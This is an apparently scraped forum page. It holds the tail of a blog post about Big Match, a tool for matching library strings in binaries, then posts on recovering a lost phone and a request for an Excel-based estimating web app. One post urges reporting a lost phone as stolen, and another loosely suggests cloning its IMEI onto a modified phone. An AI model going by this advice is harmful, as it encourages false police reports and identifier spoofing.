Gone are the days of reversers (like me) wasting weeks reversing open-source libraries embedded in their targets. OK, maybe not yet, but we made a big step towards that goal and, while quite happy with the results of Big Match v1, we are already planning the next iteration of the project. First of all, we want to integrate Big Match with our decompiler. Then, we want to add partial string matching and introduce support for magic numbers/arrays (think well-known constants like file format headers or cryptographic constants). We also want to test whether strings and constants can be reliably used to guess the exact version of a library embedded in a binary (if you have access to a library's git history, you can search for the commit that results in the best string matches). In the meantime, we need to battle-test Big Match's engine and scale up our database so that we can provide more value to users. Finally, it would be interesting to add to our database strings taken directly from binaries for which no sources are available (e.g. firmware, malware, etc.).

Once again, if you haven't done it already, go check out our Big Match demo and tell us what you think.

Until then, babush

Source
    1 point
  3. The only method, and with a prayer that things move quickly, is to go to the police with proof of purchase: if you bought it from a store, or even second-hand, provided the seller gave you paperwork for it such as an invoice or receipt. In any case, whether you lost it or it was stolen, tell the police it was stolen regardless of the situation; only then will they take you seriously and actually register your complaint. After that, all you need is patience and time, plus the hope that whoever found it or stole it doesn't drop it and crack it. It can take up to 3 months before you hear anything back from the police :). Careful: you must have a document proving the device is yours. P.S. It would have been nice if Android, even after a factory reset, stayed logged into your Google account in some hidden device-management app, and the phone could only be removed from "tracking" if you knowingly sell it on. As it is, there's no point loading anti-theft tracking software onto it, because a reset or a reflash ends the story...
    1 point
  4. If it's already gone: by the MAC address of the network interfaces? Every device's MAC address stays in the gateways' logs, but since you have no access to the access points or the servers, that's not an option. The sci-fi option: program another phone with the IMEI and the other identifiers of the lost phone, edit the firmware, put in a SIM on the same network and wait; one day the Samsung will be switched off, and at that moment your modified phone gets onto the network while his stops working, so whoever bought it will probably end up at the network operator. The legal option: the phone can be identified by its IMEI through the network operator, with a warrant, if you're lucky.
    1 point
  5. I'll try to explain as well as I can through the screenshots.

1. At work I handle quotes and estimates for insulating houses. To make my job easier I built a "program" in Excel for calculating and generating estimates, offers and contracts. The interface: in the materials and services section I have the materials and services used for a job. They live in the "preturi" (prices) tab, and in the interface I pick them from dropdowns (there are several types of foil, tape, etc., with different prices).

How I work out the price for a job: I choose the materials and services for that job, the density, the thickness of the insulation, the surface to be insulated, labour, travel, number of workers, days, and % waste for foil and tape; I also have rules for staples, patches and joint tape (how much is used per square metre). After I enter all this data I get the following results: the number of bags needed for the job (the quantity in kg divided by the 15 kg in a bag), cubic metres of material, the price in RON and EUR (I use the BNR exchange rate, which updates itself when I open the file), profit, costs, tax, and so on.

At the bottom I have "Oferta - Deviz" (offer/estimate), where I manually enter the data needed to generate the estimate and the contract: first name, last name, email, etc. The estimate fills itself in based on what is in the interface. There is also a macro button that saves the estimate as a PDF when pressed (I prefer doing it manually). I fill in the contract through mail merge with the collected data (price, square metres, address, advance, total, etc.): I open the Word contract template and it gets filled in with the data from the MailMerge tab. There is also a "txt" tab that holds the part of the estimate with the execution stages (that text changes depending on which materials and services I choose); see picture 3. To explain it properly I would need to go through the actual file.

1.1. Web interface: I tried to build something with a friend using Laravel, but it's beyond me. Roughly, I want a database for materials and prices (there are 15-20 material types at most), plus the data for the generated estimates saved in a database with a search, so that it's easy to find a job and its price (instead of digging through all the PDFs like I do now). An interface where I enter the data and generate the contract, estimate, offer, etc., and on the right-hand side of the interface the results: price, profit, costs, tax, and so on. I think I've managed to describe what I have now and what I want.

2. About the amount: I have a budget of around 100-150 euros. We can use a platform like Fiverr, etc.; that answers the rest of the questions about guarantees and payment. I hope I've explained reasonably well what I need. Thanks @MrGrj for the help!
    1 point
  6. Let me explain a bit how this works if you want to find someone:

1. Describe the project properly.
1.1 What kind of interface? Web / Desktop / Command line?
1.2 What does that Excel file look like? Are there multiple sheets? Is the file very large?
1.3 What would you like that "interface" to look like?
1.4 What do the PDF and the Word document have to do with the Excel file?
2. What amount are you offering for the above?
2.1 Are you offering an advance?
2.2 Do you guarantee that you will pay the developer who builds this project?
2.3 If you guarantee it, how?
2.4 How will you make the payment?

If you provide these details, I guarantee you will find people willing to help. Maybe even for free, for the portfolio, if it's something quick.
    1 point